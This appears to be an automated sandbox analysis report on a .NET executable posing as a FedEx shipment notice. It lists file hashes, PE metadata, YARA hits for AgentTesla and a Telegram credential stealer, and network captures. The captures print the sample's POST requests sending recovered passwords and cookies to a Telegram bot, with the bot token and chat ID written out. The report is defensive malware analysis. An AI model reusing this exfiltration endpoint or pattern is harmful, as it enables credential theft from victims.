                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Windows\System32\drivers\etc\hosts
                                                                            Process:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):835
                                                                            Entropy (8bit):4.694294591169137
                                                                            Encrypted:false
                                                                            SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                            MD5:6EB47C1CF858E25486E42440074917F2
                                                                            SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                            SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                            SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview (line breaks restored; the preview is truncated in the report):
                                                                            # Copyright (c) 1993-2009 Microsoft Corp.
                                                                            #
                                                                            # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
                                                                            #
                                                                            # This file contains the mappings of IP addresses to host names. Each
                                                                            # entry should be kept on an individual line. The IP address should
                                                                            # be placed in the first column followed by the corresponding host name.
                                                                            # The IP address and the host name should be separated by at least one
                                                                            # space.
                                                                            #
                                                                            # Additionally, comments (such as these) may be inserted on individual
                                                                            # lines or following the machine name denoted by a '#' symbol.
                                                                            #
                                                                            # For example:
                                                                            #
                                                                            #      102.54.94.97     rhino.acme.com          # source server
                                                                            #       38.25.63.10     x.acme.com              # x client host
                                                                            
                                                                            # localhost name resolution is handled within DNS itself.
                                                                            #	127.0.0.1       localhost
                                                                            #	::1             localhost
                                                                            
                                                                            127.0.0.1

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.874907024171262
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File size:517120
                                                                            MD5:994f1f286b24022af59bc5506b1e2871
                                                                            SHA1:ed961648e2e90a311a9c5e53c15eed3d95853b96
                                                                            SHA256:edd31cd4c64b1d9f392c6e141a10c028cb11f9640e6eab34960baf6bdd585dc5
                                                                            SHA512:532a74ac29dc23ff20c802ab9db472f793379bb81c9041cb0e7488f692861a2902bffe71814917db0338abb25544146c21cc9934630825817f437576a8ba4324
                                                                            SSDEEP:12288:ZN70vixBFmJ55wqgO/hUaXOjBhpSYyCiApDAvYNo:z70vi1ObgO/haBwWNo
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jE.a..............0.............Z.... ........@.. .......................@............@................................

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x47f95a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x619F456A [Thu Nov 25 08:12:26 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]

                                                                            Data Directories

                                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7f908 | 0x4f | .text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x80000 | 0x5bc | .rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x82000 | 0xc | .reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                            Sections

                                                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                            .text | 0x2000 | 0x7d970 | 0x7da00 | False | 0.900664645522 | data | 7.88525497927 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc | 0x80000 | 0x5bc | 0x600 | False | 0.430338541667 | data | 4.13854845125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc | 0x82000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            Name | RVA | Size | Type | Language | Country
                                                                            RT_VERSION | 0x80090 | 0x32c | data | |
                                                                            RT_MANIFEST | 0x803cc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                            Imports

                                                                            DLL | Import
                                                                            mscoree.dll | _CorExeMain

                                                                            Version Infos

                                                                            Description | Data
                                                                            Translation | 0x0000 0x04b0
                                                                            LegalCopyright | Copyright Rogers Peet
                                                                            Assembly Version | 8.0.6.0
                                                                            InternalName | DESCKI.exe
                                                                            FileVersion | 5.6.0.0
                                                                            CompanyName | Rogers Peet
                                                                            LegalTrademarks |
                                                                            Comments |
                                                                            ProductName | Biblan
                                                                            ProductVersion | 5.6.0.0
                                                                            FileDescription | Biblan
                                                                            OriginalFilename | DESCKI.exe

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 25, 2021 18:50:16.754606009 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:16.754653931 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:16.754739046 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:16.826662064 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:16.826689959 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:16.901915073 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:16.902096987 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:16.907088995 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:16.907105923 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:16.907546997 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:16.947648048 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:18.371007919 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:18.398168087 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:18.401303053 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:18.448870897 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:18.482965946 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:18.483073950 CET | 443 | 49812 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:18.483330011 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:18.484544992 CET | 49812 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.019704103 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.019757986 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.019880056 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.020394087 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.020417929 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.079303026 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.083409071 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.083462000 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.133424044 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.135560036 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.135613918 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.295952082 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.296042919 CET | 443 | 49814 | 149.154.167.220 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:20.296165943 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220
                                                                            Nov 25, 2021 18:50:20.296937943 CET | 49814 | 443 | 192.168.2.5 | 149.154.167.220

                                                                            UDP Packets

                                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                            Nov 25, 2021 18:50:16.611881018 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
                                                                            Nov 25, 2021 18:50:16.644406080 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
                                                                            Nov 25, 2021 18:50:19.986143112 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
                                                                            Nov 25, 2021 18:50:20.018466949 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5

                                                                            DNS Queries

                                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                            Nov 25, 2021 18:50:16.611881018 CET | 192.168.2.5 | 8.8.8.8 | 0x2e90 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)
                                                                            Nov 25, 2021 18:50:19.986143112 CET | 192.168.2.5 | 8.8.8.8 | 0xd69 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001)

                                                                            DNS Answers

                                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                            Nov 25, 2021 18:50:16.644406080 CET | 8.8.8.8 | 192.168.2.5 | 0x2e90 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)
                                                                            Nov 25, 2021 18:50:20.018466949 CET | 8.8.8.8 | 192.168.2.5 | 0xd69 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • api.telegram.org

                                                                            HTTPS Proxied Packets

                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            0 | 192.168.2.5 | 49812 | 149.154.167.220 | 443 | C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            2021-11-25 17:50:18 UTC | 0 | OUT |
                                                                            POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1014
                                                                            Expect: 100-continue
                                                                            Connection: Keep-Alive
                                                                            2021-11-25 17:50:18 UTC | 0 | IN |
                                                                            HTTP/1.1 100 Continue
                                                                            Data Ascii: -----------------------------8d9b05ed69793f6Content-Disposition: form-data; name="chat_id"1748127586-----------------------------8d9b05ed69793f6Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/128757OSFul
                                                                            2021-11-25 17:50:18 UTC | 1 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 25 Nov 2021 17:50:18 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 618
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            {"ok":true,"result":{"message_id":1828,"from":{"id":1881721018,"is_bot":true,"first_name":"evilc0de","username":"evilc0de_bot"},"chat":{"id":1748127586,"first_name":"evilc0de","username":"evilc0de","type":"private"},"date":1637862618,"document":{"file_name":"user-128757 2021-11-25 09-59-22.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIHJGGfzNq3xPlvdNKuuWOMmi0i0d_-AAKiCwACRFj5UPeAoRbRWnzoIgQ","file_unique_id":"AgADogsAAkRY-VA","file_size":442},"caption":"New PW Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                            1 | 192.168.2.5 | 49814 | 149.154.167.220 | 443 | C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                            2021-11-25 17:50:20 UTC | 2 | OUT | POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary=---------------------------8d9b06051514af6
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1900
                                                                            Expect: 100-continue
                                                                            2021-11-25 17:50:20 UTC | 2 | IN | HTTP/1.1 100 Continue
                                                                            2021-11-25 17:50:20 UTC2OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 30 36 30 35 31 35 31 34 61 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 37 34 38 31 32 37 35 38 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 30 36 30 35 31 35 31 34 61 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f
                                                                            Data Ascii: -----------------------------8d9b06051514af6Content-Disposition: form-data; name="chat_id"1748127586-----------------------------8d9b06051514af6Content-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/128757O
                                                                            2021-11-25 17:50:20 UTC3OUTData Raw: 1b 1b 43 a6 3d 86 a6 b3 9b 5d f0 1d cd 91 90 c9 4b 86 c6 14 53 cb b2 fc 22 35 d7 87 32 c9 78 5f 46 a6 c1 ab 13 16 a2 ce 1c 85 a8 33 05 4d 4d cd ee aa ba 68 40 20 7a 61 98 ed 31 ef cd d9 cd 2a 6a c9 e2 b3 69 a5 bc 14 94 48 f9 c1 b3 4b a8 ae ab ad 15 f6 86 67 57 51 9e 59 aa 13 5d 7f 58 3f 4e 4e d0 59 19 89 de 64 d7 8e 68 aa 63 6b b4 a2 63 e5 ee 6c 4f c5 7b a2 a9 41 da 2d 0f 86 e8 95 61 a8 a8 de d4 e8 aa aa 6b af 5d a8 5b 4e 0b 4a c4 b9 3a 7b fb 25 ce fa f6 d9 51 94 de 26 d2 f7 d2 39 fb 06 00 00 00 00 00 00 00 ff 4a b7 88 62 bb 7f f6 bc 46 e3 f9 a2 6a e9 43 39 a6 8c 3a 87 2e bc 10 d9 b0 dc 25 06 fc d7 52 2b 05 b1 c1 9f cf ab 45 c5 b4 54 ab 64 36 47 96 12 67 ff 3f 43 a4 19 e9 07 e9 cb 7f fa bf 00 00 00 00 00 00 00 c0 a2 02 62 bb b0 c0 29 80 b8 4c 0c 08 e5 67
                                                                            Data Ascii: C=]KS"52x_F3MMh@ za1*jiHKgWQY]X?NNYdhckclO{A-ak][NJ:{%Q&9JbFjC9:.%R+ETd6Gg?Cb)Lg
                                                                            2021-11-25 17:50:20 UTC | 4 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 25 Nov 2021 17:50:20 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 628
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            {"ok":true,"result":{"message_id":1829,"from":{"id":1881721018,"is_bot":true,"first_name":"evilc0de","username":"evilc0de_bot"},"chat":{"id":1748127586,"first_name":"evilc0de","username":"evilc0de","type":"private"},"date":1637862620,"document":{"file_name":"user-128757 2021-11-25 10-08-34.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIHJWGfzNyKPKRjN_VBk8WARsop4AwxAAKjCwACRFj5UK8WrT-g3WnaIgQ","file_unique_id":"AgADowsAAkRY-VA","file_size":1319},"caption":"New Cookie Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            System Behavior

                                                                            General

                                                                            Start time:18:48:25
                                                                            Start date:25/11/2021
                                                                            Path:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe"
                                                                            Imagebase:0xb50000
                                                                            File size:517120 bytes
                                                                            MD5 hash:994F1F286B24022AF59BC5506B1E2871
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Start time:18:48:28
                                                                            Start date:25/11/2021
                                                                            Path:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            Imagebase:0xdb0000
                                                                            File size:517120 bytes
                                                                            MD5 hash:994F1F286B24022AF59BC5506B1E2871
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Disassembly

                                                                            Code Analysis